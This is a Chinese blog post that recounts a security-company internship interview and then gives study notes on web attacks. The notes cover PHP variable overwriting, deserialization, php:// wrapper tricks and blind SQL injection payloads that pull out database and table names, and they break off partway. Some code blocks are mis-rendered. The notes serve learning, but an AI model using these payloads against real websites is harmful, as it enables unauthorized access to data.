<!DOCTYPE html>

<!--
  portfolYOU Jekyll theme by Youssef Raafat
  Free for personal and commercial use under the MIT license
  https://github.com/YoussefRaafatNasry/portfolYOU
-->

<html lang="en" class="h-100">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content=""循此苦旅，以达星辰"">

  <title>Yvan's blog</title>
  <link rel="shortcut icon" type="image/x-icon" href="/assets/favicon.ico">

  <!-- Font Awesome CDN -->
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css">

  <!-- Bootstrap CSS CDN -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">

  <!-- Animate CSS CDN -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.0/animate.css" type="text/css"/>
  
  <!-- Custom CSS -->
  <link rel="stylesheet" href="/assets/css/style.css" type="text/css">

  <!-- Mathjax for latex -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>

  <!-- comment system -->
  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>

</head>


<body class="d-flex flex-column h-100">

  <main class="flex-shrink-0 container mt-5">
  <nav class="navbar navbar-expand-lg navbar-light">

  <a class="navbar-brand" href="/"><h5><b>Yvan's blog</b></h5></a>

  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>

  <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
    <div class="navbar-nav ml-auto"><a class="nav-item nav-link " href="/projects/">Projects</a>

      <a class="nav-item nav-link active" href="/blog/">Blog</a>

      <a class="nav-item nav-link " href="/link/">Link</a>

      <a class="nav-item nav-link " href="/about/">About</a>

      <a class="nav-item nav-link " href="/about_en/">AboutEN</a>

      

    </div>
  </div>

</nav>
  <div class="col-lg-10 mx-auto mt-5 post">
  <h1><b>chaitin面试经历</b></h1>

<p class="post-metadata text-muted">
  12 December 2019 -
  <b>20 mins read time</b>

  <br>Tags:
  
  <a class="text-decoration-none no-underline" href="/blog/tags#review">
    <span class="tag badge badge-pill text-primary border border-primary">review</span>
  </a>
  </p>

<h4 id="背景">背景</h4>

<hr />

<p>  求简大佬内推, 2019.12.12去阿里云安全旗下的长亭科技面试, 超级紧张,毕竟是地表最强安全公司. 面试时间15:30,我14:26从806出发,路上吃了碗面,然后找20min没找到地方….后来发现是导航错了.
15:26分,到达公司. 看到一堆小零食和一柜子饮料,还有一堆黑客(划掉)安全人员. HR小姐姐人超级好,在微信上和我斗图哈哈哈,然后带来了某巨佬面试我,史上最硬核面试开始了…</p>

<h4 id="面试">面试</h4>

<hr />

<h5 id="后来知道这是p师傅师傅实在是太强了现在每天给师傅递茶-">后来知道这是P师傅，师傅实在是太强了，现在每天给师傅递茶。:-)</h5>

<p>  面试官是一位超级和善的安全研究员,先从最简单的开始问我,栈溢出的原理是啥类,linux下二进制保护措施有啥呀,原理是啥呀,咋绕过呀,能不能更给力一点呀同学?</p>

<p>我: 叽里呱啦….</p>

<p>带佬: 说说Heap segment的结构呗?</p>

<p>我: 首先程序刚开始没有建立Heap Segment,第一次malloc时创建堆段……</p>

<p>带佬: 简单的说一下malloc_chunk的结构吧</p>

<p>我: 首先他是个结构体…….</p>

<p>带佬: 第一次运行malloc时具体发生了啥鸭?</p>

<p>我: 第一分配内存首先要运行molloc_consolidate然后malloc_init_state进行初始化…..</p>

<p>带佬: unlink有什么问题吗?</p>

<p>我: 可能导致任意写或者地址泄漏,但是高版本的glibc加了验证,几乎不能任意写了</p>

<p>带佬: 对操作系统内核溢出有了解吗?</p>

<p>我: 嘤嘤嘤…没有</p>

<p>带佬: …</p>

<p>带佬: sql注入大概分为那几种啊?</p>

<p>我: 有回显,无回显(盲注)</p>

<p>带佬: 盲注分为哪几种,分别怎么利用</p>

<p>我: 叽里呱啦…</p>

<p>带佬: order by和limit注入分别怎么利用</p>

<p>我: 呱啦叽里…</p>

<p>带佬: ssrf盲打如何操作, 如何验证payload, 如何内网打redis</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/cry.jpeg?raw=true" alt="cry" /></p>

<p>我: 嘤嘤嘤…不会</p>

<p>带佬: linux下如何代码注入? 如何检测rootkit?</p>

<p>我: 嗯…ptrace? 然后分析流量?…(哭</p>

<p>带佬: …ELF的格式给讲讲呗</p>

<p>我: 啊, 那个头巴拉巴拉…..(勉强萌混过关)</p>

<p>带佬: 还行, 分析过cve么,就前几天那个phpfmp的洞看过吗?</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/cry.jpeg?raw=true" alt="cry" /></p>

<p>我: …哭</p>

<p>带佬: 了解TLB的原理么,简单说说呗? 还有进程间通信啥的?</p>

<p>我: 巴拉巴拉…对吧….</p>

<p>带佬: 还能更底层么?</p>

<p>我: …嘤..不会了</p>

<p>带佬: 内网渗透用哪些转发工具</p>

<p>我: lcx frp</p>

<p>带佬: ssh的转发功能用过么? 了解扫描器原理么? 端口显示open close filter意味着什么,从协议角度分析一下.</p>

<p>我: 啊? 啊? 啊?…不会</p>

<p>带佬: … section和segment啥区别呀</p>

<p>我: 一个segment由多个section组成?…</p>

<p>带佬: 恩, 解释性语言的逆向原理了解过么,就pyc那种.</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/cry.jpeg?raw=true" alt="cry" /></p>

<p>我: …无</p>

<p>带佬: TCP/IP三次握手讲讲呗?</p>

<p>我: 嗯…叽里呱啦..是吧?…</p>

<p>带佬似笑非笑: 你这个cpu怎么写的啊</p>

<p>我(都让让,我要装逼了): 乌啦乌啦…大概就是这样(恩,牛逼吧)</p>

<p>带佬: 还行, linux下的SIGNAL了解么</p>

<p>我: 只是用过,kill -9之类的…原理不懂</p>

<p>带佬: linux熟么?</p>

<p>我(熟的一p): 还行</p>

<p>带佬: 查看端口, 查找内容, 检测流量, 监视进程, 硬件读写,….噼里啪啦问了一堆</p>

<p>我: %^#@!大概就是这样</p>

<p>带佬: 恩,还行.正向shell和反向shell有什么区别?</p>

<p>我: 这样那样…</p>

<p>带佬: 权限维持咋弄啊?</p>

<p>我: crontab……</p>

<p>带佬: 反序列化讲讲</p>

<p>我: ….嗯嗯大概这样</p>

<p>带佬: 固件提取咋整啊</p>

<p>我: 编程器搞出来, binwalk看一看, ida擼一撸</p>

<p>带佬: binwalk分析不出来咋正呀?</p>

<p>我: 啊? 还能这样?</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/cry.jpeg?raw=true" alt="cry" /></p>

<p>带佬: magic number被去掉了或者elf结构乱了你分析个啥啊</p>

<p>我: 嗷嗷嗷…</p>

<p>带佬: 还行吧,我简单介绍一下我们部门….噼里啪啦…看你个人选择吧,我们这边偏业务研究,综合性比较强,楼下偏理论,负责打比赛搞名气的.</p>

<p>我: 都行都行</p>

<p>带佬: 有啥要问我的么?</p>

<p>我: 能发offer么</p>

<p>带佬: …还行, 我去叫hr</p>

<p>我: …</p>

<h4 id="超级nice的hr姐姐">超级nice的HR姐姐</h4>

<hr />

<p>  HR姐姐就问了问性格啥的, 能来几天啊, 为啥干这个呀, 然后开始跟她将笑话…嗯…</p>

<p>HR姐姐: 我们一天300</p>

<p>我(woc这么多): 嗯, 还行</p>

<p>HR姐姐: 包吃</p>

<p>我(woc还包吃): 哦, 不错哦</p>

<p>HR姐姐: 有啥要问得嘛?加个微信呗?</p>

<p>我(加加加): 能给offer么?哭哭</p>

<p>HR姐姐: 哈哈哈这两天会通知你结果.</p>

<h4 id="结果">结果</h4>

<hr />

<p>  出来的时候才意识到只有一次技术面,看网上都是好几面…但是感觉挺稳的,毕竟相谈甚欢,赶紧问问简大佬</p>

<p>大概过了一个小时, 简大老和我说稳了….耶! 点个外卖奖励一下自己.</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/smile.jpg?raw=true" alt="smile" /></p>

<h4 id="基础知识整理">基础知识整理</h4>

<p>  整理了一下基础知识, 整理了一半web突然发现我是想申二进制来着…不管了</p>

<h2 id="web">web</h2>

<hr />

<h3 id="php">php</h3>

<ol>
  <li>变量覆盖
    <ol>
      <li>extract()变量覆盖
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">int</span> <span class="nb">extract</span> <span class="p">(</span> <span class="k">array</span> <span class="nv">$var_array</span> <span class="p">[,</span> <span class="n">int</span> <span class="nv">$extract_type</span> <span class="p">[,</span> <span class="n">string</span> <span class="nv">$prefix</span> <span class="p">]])</span>
</code></pre></div>        </div>
        <p>extract()函数将一个键值数组数组中的值导入符号表.第三个参数可以设置为<code class="language-plaintext highlighter-rouge">EXTR_SKIP</code>避免覆盖,默认为<code class="language-plaintext highlighter-rouge">EXRE_OVERWRITE</code>.</p>
      </li>
      <li>parse_str()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">void</span> <span class="nb">parse_str</span> <span class="p">(</span> <span class="n">string</span> <span class="nv">$str</span> <span class="p">[,</span> <span class="k">array</span> <span class="o">&amp;</span><span class="nv">$arr</span> <span class="p">])</span>
</code></pre></div>        </div>
        <p>parse_str()将字符串解析到变量中.
 例如:</p>
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cp">&lt;?php</span>
<span class="nv">$a</span> <span class="o">=</span> <span class="s1">'oop'</span><span class="p">;</span>
<span class="nb">parse_str</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">"QUERY_STRING"</span><span class="p">]);</span>
   
<span class="k">if</span> <span class="p">(</span><span class="nv">$a</span> <span class="o">==</span> <span class="s1">'fuck'</span><span class="p">)</span> <span class="p">{</span>
   <span class="k">echo</span> <span class="s2">"Hacked!"</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
   <span class="k">echo</span> <span class="s2">"Hello!"</span><span class="p">;</span>
<span class="p">}</span>
 <span class="cp">?&gt;</span>
</code></pre></div>        </div>
        <p>构造payload: curl “127.0.0.1?a=fuck”</p>
      </li>
      <li>\(value 类型覆盖
php中变量值可作为第二个变量的名.例如:
 ```php
 $a = "hello";\)a = “world”;</li>
    </ol>

    <p>echo “$a $$a”;   // helloworld
 echo “$a ${$a}”; //helloworld
 echo “${“hello”}”; //world</p>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 因此foreach在遍历数组时可能导致覆盖,例如:
 ```php
 &lt;?php
 foreach (array('_COOKIE','_POST','_GET') as $_request)  {
     foreach ($$_request as $_key=&gt;$_value)  {
     $$_key=  $_value;
     }
 }
 $id = isset($id) ? $id : "test";   
 if($id === "fuck") {
     echo "flag{xxxxxxxxxx}";
 } else {
    echo "Nothing...";
 }
 ?&gt; 
</code></pre></div>    </div>
    <p>?id=fuck 可覆盖id变量</p>

    <ol>
      <li>import_request_variables()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">bool</span> <span class="nb">import_request_variables</span> <span class="p">(</span><span class="n">string</span> <span class="nv">$types</span> <span class="p">[,</span> <span class="n">string</span> <span class="nv">$prefix</span><span class="p">])</span>
</code></pre></div>        </div>
        <p>$type代表要注册的变量，G代表GET，P代表POST，C代表COOKIE，第二个参数为要注册变量的前缀.
 例如:</p>
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cp">&lt;?php</span>
<span class="nv">$a</span> <span class="o">=</span> <span class="s2">"0"</span><span class="p">;</span>
<span class="nb">import_request_variables</span><span class="p">(</span><span class="s2">"G"</span><span class="p">);</span>
   
<span class="k">if</span> <span class="p">(</span><span class="nv">$a</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">echo</span> <span class="s2">"Fucked!"</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="k">echo</span> <span class="s2">"Nothing!"</span><span class="p">;</span>
<span class="p">}</span>
 <span class="cp">?&gt;</span>
</code></pre></div>        </div>
        <p>?a=1 就会echo fucked</p>
      </li>
    </ol>
  </li>
  <li>反序列化
将json转化为实例后恶意执行代码,例:
```php
&lt;?php 
class test
{
 public $flag = “flag{233}”;
 protected $b = “b”;
 private $c = “c”;
}</li>
</ol>

<p>$test = new test();
$data = serialize($test);
echo $data;
?&gt;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
得到:

```json
O:4:"test":3:{s:4:"flag";s:9:"flag{233}";s:4:"*b";s:1:"b";s:7:"testc";s:1:"c";}
</code></pre></div></div>

<p>一般以type:length:content;这种格式存在.要注意两点
    1. protected类型属性名会变成 – %00*%00属性名
    2. private类型属性名会变成   – %00类名%00属性名</p>

<h4 id="相关magic方法">相关magic方法</h4>
<p>必须知道的魔法方法：
这里就不得不介绍几个我们必须知道的魔法方法了</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. construct()：当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。
2. wakeup() ：unserialize()时会自动调用
3. destruct()：当对象被销毁时会自动调用。
4. toString():当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用
5. get() :当从不可访问的属性读取数据
6. call(): 在对象上下文中调用不可访问的方法时触发
</code></pre></div></div>

<h4 id="利用phar扩展攻击面">利用phar://扩展攻击面</h4>

<p><a href="https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">参考文章</a></p>

<ol>
  <li>魔法函数
    <ol>
      <li>__sleep() 和 __wakeup()</li>
      <li>__construct() 和 __destruct()</li>
      <li>__toString()</li>
      <li>__invoke() 和 __call()</li>
      <li>__get() 和  __set()</li>
    </ol>
  </li>
  <li>危险函数
    <ul>
      <li>system()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">system</span> <span class="p">(</span> <span class="n">string</span> <span class="nv">$command</span> <span class="p">[,</span> <span class="n">int</span> <span class="o">&amp;</span><span class="nv">$return_var</span> <span class="p">]</span> <span class="p">)</span>
</code></pre></div>        </div>
      </li>
      <li>shell_exec()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">shell_exec</span> <span class="p">(</span> <span class="n">string</span> <span class="nv">$cmd</span> <span class="p">)</span>
</code></pre></div>        </div>
      </li>
      <li>exec()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">exec</span><span class="p">(</span> <span class="n">string</span> <span class="nv">$cmd</span> <span class="p">)</span>
</code></pre></div>        </div>
      </li>
      <li>passthru()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">passthru</span> <span class="p">(</span> <span class="n">string</span> <span class="nv">$command</span> <span class="p">[,</span> <span class="n">int</span> <span class="o">&amp;</span><span class="nv">$return_var</span> <span class="p">]</span> <span class="p">)</span>
</code></pre></div>        </div>
      </li>
      <li>assert()
如果assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">assert</span> <span class="p">(</span> <span class="n">mixed</span> <span class="nv">$assertion</span> <span class="p">[,</span> <span class="n">string</span> <span class="nv">$description</span> <span class="p">]</span> <span class="p">)</span>
</code></pre></div>        </div>
      </li>
      <li>popen()
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">resource</span> <span class="nb">popen</span> <span class="p">(</span> <span class="n">string</span> <span class="n">command</span><span class="p">,</span> <span class="n">string</span> <span class="n">mode</span> <span class="p">)</span>
</code></pre></div>        </div>
        <p>打开一个指向进程的管道，该进程由派生给定的 command 命令执行而产生。 返回一个和 fopen() 所返回的相同的文件指针，只不过它是单向的（只能用于读或写）并且必须用 pclose() 来关闭。此指针可以用于 fgets()，fgetss() 和 fwrite().</p>
      </li>
    </ul>
  </li>
</ol>

<ul>
  <li>proc_open()
    <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">resource</span> <span class="nb">proc_open</span> <span class="p">(</span> <span class="n">string</span> <span class="n">cmd</span><span class="p">,</span> <span class="k">array</span> <span class="n">descriptorspec</span><span class="p">,</span> <span class="k">array</span> <span class="o">&amp;</span><span class="n">pipes</span> <span class="p">[,</span> <span class="n">string</span> <span class="n">cwd</span> <span class="p">[,</span> <span class="k">array</span> <span class="n">env</span> <span class="p">[,</span> <span class="k">array</span> <span class="n">other_options</span><span class="p">]]]</span> <span class="p">)</span>
</code></pre></div>    </div>
    <p>与popen类似，但是可以提供双向管道。具体的参数读者可 以自己翻阅php manual</p>
  </li>
</ul>

<blockquote>
  <p>注意：
A. 后面需要使用proc_close()关闭资源，并且如果是 pipe 类型，需要用 pclose() 关闭句柄。
B. proc_open 打开的程序作为 php 的子进程，php 退出后该子进程也会退出。</p>
</blockquote>

<ul>
  <li>其他
    <ul>
      <li>pfsockopen()</li>
      <li>syslog()</li>
      <li>openlog()</li>
      <li>chroot()</li>
      <li>chown()</li>
      <li>scandir()</li>
    </ul>
  </li>
  <li>伪协议
    <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">file</span><span class="o">://</span> <span class="err">—</span> <span class="n">访问本地文件系统</span>
<span class="n">http</span><span class="o">://</span> <span class="err">—</span> <span class="n">访问</span> <span class="nf">HTTP</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="n">网址</span>
<span class="n">ftp</span><span class="o">://</span> <span class="err">—</span> <span class="n">访问</span> <span class="nf">FTP</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="nc">URLs</span>
<span class="n">php</span><span class="o">://</span> <span class="err">—</span> <span class="n">访问各个输入</span><span class="o">/</span><span class="n">输出流</span><span class="err">（</span><span class="nc">I</span><span class="o">/</span><span class="nc">O</span> <span class="n">streams</span><span class="err">）</span>
<span class="n">zlib</span><span class="o">://</span> <span class="err">—</span> <span class="n">压缩流</span>
<span class="n">data</span><span class="o">://</span> <span class="err">—</span> <span class="n">数据</span><span class="err">（</span><span class="no">RFC</span> <span class="mi">2397</span><span class="err">）</span>
<span class="n">glob</span><span class="o">://</span> <span class="err">—</span> <span class="n">查找匹配的文件路径模式</span>
<span class="n">phar</span><span class="o">://</span> <span class="err">—</span> <span class="no">PHP</span> <span class="n">归档</span>
<span class="n">ssh2</span><span class="o">://</span> <span class="err">—</span> <span class="nc">Secure</span> <span class="nc">Shell</span> <span class="mi">2</span>
<span class="n">rar</span><span class="o">://</span> <span class="err">—</span> <span class="no">RAR</span>
<span class="n">ogg</span><span class="o">://</span> <span class="err">—</span> <span class="n">音频流</span>
<span class="n">expect</span><span class="o">://</span> <span class="err">—</span> <span class="n">处理交互式的流</span>
</code></pre></div>    </div>
  </li>
</ul>

<ol>
  <li>
    <p>file://  <br />
 用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响</p>
  </li>
  <li>
    <p>php://
 php://filter在双off的情况下也可以正常使用；
 条件：
 不需要开启allow_url_fopen，仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启    allow_url_include</p>
  </li>
  <li>php://filter
 php://filter 是一种元封装器， 设计用于数据流打开时的筛选过滤应用。 这对于一体式（all-in-one）的文件函数非常有用，类似 readfile()、 file() 和 file_get_contents()， 在数据流内容读取之前没有机会应用其他过滤器。
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> resource=&lt;要过滤的数据流&gt;     这个参数是必须的。它指定了你要筛选过滤的数据流。
 read=&lt;读链的筛选列表&gt;         该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分 隔。
 write=&lt;写链的筛选列表&gt;    该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。
 &lt;；两个链的筛选列表&gt;        任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于    读或写链。
</code></pre></div>    </div>
    <p>php://filter/read=convert.base64-encode/resource=upload.php
 这里读的过滤器为convert.base64-encode，就和字面上的意思一样，把输入流base64-encode。
 esource=upload.php，代表读取upload.php的内容</p>
  </li>
  <li>php://input
 php://input 是个可以访问请求的原始数据的只读流,可以读取到post没有解析的原始数据, 将post请求中的数据作为PHP代码执行。因为它不依赖于特定的 php.ini 指令。
 注：enctype=”multipart/form-data” 的时候 php://input 是无效的。
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>allow_url_fopen ：off/on
allow_url_include：on
</code></pre></div>    </div>
  </li>
  <li>file:// data:// 等</li>
</ol>

<p><a href="https://www.freebuf.com/column/148886.html">参考文章</a></p>

<ol>
  <li>文件包含
    <ol>
      <li>include()</li>
      <li>inlcude_onec()</li>
      <li>require()</li>
      <li>require_once()</li>
      <li>各种伪协议
 <a href="https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">参考文章</a></li>
    </ol>
  </li>
  <li>
    <p>命令执行
 见危险函数和反序列化</p>
  </li>
  <li>常见框架
    <ol>
      <li>ThinkPHP
        <ul>
          <li><a href="https://www.freebuf.com/column/209612.html">RCE</a></li>
          <li><a href="https://xz.aliyun.com/t/2812">Inject</a></li>
        </ul>
      </li>
      <li>Laravel
        <ul>
          <li><a href="https://xz.aliyun.com/t/5331">Inject</a> (比较鸡肋)</li>
          <li><a href="https://www.jianshu.com/p/5aac92a4949f">Unserialize</a> 太强了</li>
        </ul>
      </li>
      <li>Zend</li>
      <li>Lumen</li>
    </ol>
  </li>
</ol>

<h3 id="sql-inject">SQL Inject</h3>
<ol>
  <li>盲注
    <ol>
      <li>基于Bool</li>
      <li>基于时间</li>
      <li>基于报错</li>
    </ol>
  </li>
</ol>

<blockquote>
  <p>这一部分知识点爆炸多</p>
</blockquote>

<h4 id="基于bool">基于Bool</h4>
<p>一般这种注入要求我们构造逻辑判断,通常需要我们截取字符串然后进行比对.
常用的截取函数:</p>
<ul>
  <li>mid()</li>
  <li>substr()</li>
  <li>left()</li>
</ul>

<h6 id="mid函数">MID()函数</h6>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MID</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span><span class="k">start</span><span class="p">[,</span><span class="k">length</span><span class="p">])</span>
</code></pre></div></div>

<ul>
  <li>column_name 必需 要提取字符的字段</li>
  <li>start   必需 规定开始位置(起始值是 1)</li>
  <li>length    可选 要返回的字符数,如果省略,则 MID()函数返回剩余文本</li>
</ul>

<p>Eg: str=”123456”     mid(str,2,1)    结果为2</p>

<p>用例:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">MID</span><span class="p">(</span><span class="k">DATABASE</span><span class="p">(),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&gt;</span> <span class="s1">'a'</span>
</code></pre></div></div>
<p>查看数据库名第一位，MID(DATABASE(),2,1)查看数据库名第二位，依次查看各位字 符。</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">MID</span><span class="p">((</span><span class="k">SELECT</span> <span class="k">table_name</span> <span class="k">FROM</span> <span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span> <span class="k">WHERE</span> <span class="n">T</span> <span class="n">table_schema</span><span class="o">=</span><span class="mi">0</span><span class="n">xxxxxxx</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span> <span class="o">&gt;</span><span class="s1">'a'</span>
</code></pre></div></div>
<p>此处column_name参数可以为sql语句，可自行构造sql语句进行注入。</p>

<h6 id="substr函数">SUBSTR()函数</h6>

<p>Substr()和substring()函数实现的功能是一样的,均为截取字符串.</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">string</span> <span class="k">substring</span><span class="p">(</span><span class="n">string</span><span class="p">,</span> <span class="k">start</span><span class="p">,</span> <span class="k">length</span><span class="p">)</span>
<span class="n">string</span> <span class="n">substr</span><span class="p">(</span><span class="n">string</span><span class="p">,</span> <span class="k">start</span><span class="p">,</span> <span class="k">length</span><span class="p">)</span>
</code></pre></div></div>
<p>参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。</p>

<p>用例：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">substr</span><span class="p">(</span><span class="k">DATABASE</span><span class="p">(),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&gt;</span> <span class="s1">'a'</span>
</code></pre></div></div>
<p>查看数据库名第一位，substr(DATABASE(),2,1)查看数据库名第二位，依次查看各位字符。</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">substr</span><span class="p">((</span><span class="k">SELECT</span> <span class="k">table_name</span> <span class="k">FROM</span> <span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span> <span class="k">WHERE</span> <span class="n">T</span> <span class="n">table_schema</span><span class="o">=</span><span class="mi">0</span><span class="n">xxxxxxx</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span>    <span class="mi">1</span><span class="p">)</span> <span class="o">&gt;</span> <span class="s1">'a'</span>
</code></pre></div></div>
<p>此处string参数可以为sql语句，可自行构造sql语句进行注入。</p>

<h6 id="left函数">LEFT()函数</h6>

<p>Left()得到字符串左部指定个数的字符</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">Left</span> <span class="p">(</span> <span class="n">string</span><span class="p">,</span> <span class="n">n</span> <span class="p">)</span>
</code></pre></div></div>
<p>string为要截取的字符串,n为长度.
 用例：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">left</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="s1">'a'</span>
</code></pre></div></div>

<p>查看数据库名第一位</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">left</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span><span class="o">&gt;</span> <span class="s1">'ab'</span>
</code></pre></div></div>

<p>查看数据库名前二位。
同样的string可以为自行构造的sql语句。</p>

<h6 id="ord函数">ORD()函数</h6>
<p>同时也要介绍ORD()函数，此函数为返回第一个字符的ASCII码，经常与上面的函数进行组合使用。
例如:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ORD</span><span class="p">(</span><span class="n">MID</span><span class="p">(</span><span class="k">DATABASE</span><span class="p">(),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">114</span>
</code></pre></div></div>

<p>意为检测database()的第一位ASCII码是否大于114,也即是’r’</p>

<h5 id="构造方式">构造方式</h5>

<p>字符串函数构造</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ascii</span><span class="p">(</span><span class="n">substr</span><span class="p">((</span><span class="k">select</span> <span class="k">table_name</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span> <span class="k">where</span> <span class="n">tables_schema</span><span class="o">=</span><span class="k">database</span><span class="p">()</span><span class="k">limit</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span><span class="o">=</span><span class="mi">101</span> <span class="c1">--+        //substr()数，ascii()函数</span>
</code></pre></div></div>

<p>正则构造</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">select</span> <span class="k">user</span><span class="p">()</span> <span class="n">regexp</span> <span class="s1">'^[a-z]'</span><span class="p">;</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">users</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="mi">1</span> <span class="k">and</span> <span class="mi">1</span><span class="o">=</span><span class="p">(</span><span class="k">user</span><span class="p">()</span> <span class="n">regexp</span><span class="s1">'^ri'</span><span class="p">);</span>
<span class="k">select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">users</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="mi">1</span> <span class="k">and</span> <span class="mi">1</span><span class="o">=</span><span class="p">(</span><span class="n">if</span><span class="p">((</span><span class="k">user</span><span class="p">()</span> <span class="n">regexp</span> <span class="s1">'^r'</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">0</span><span class="p">));</span>
</code></pre></div></div>

<p>like匹配注入</p>

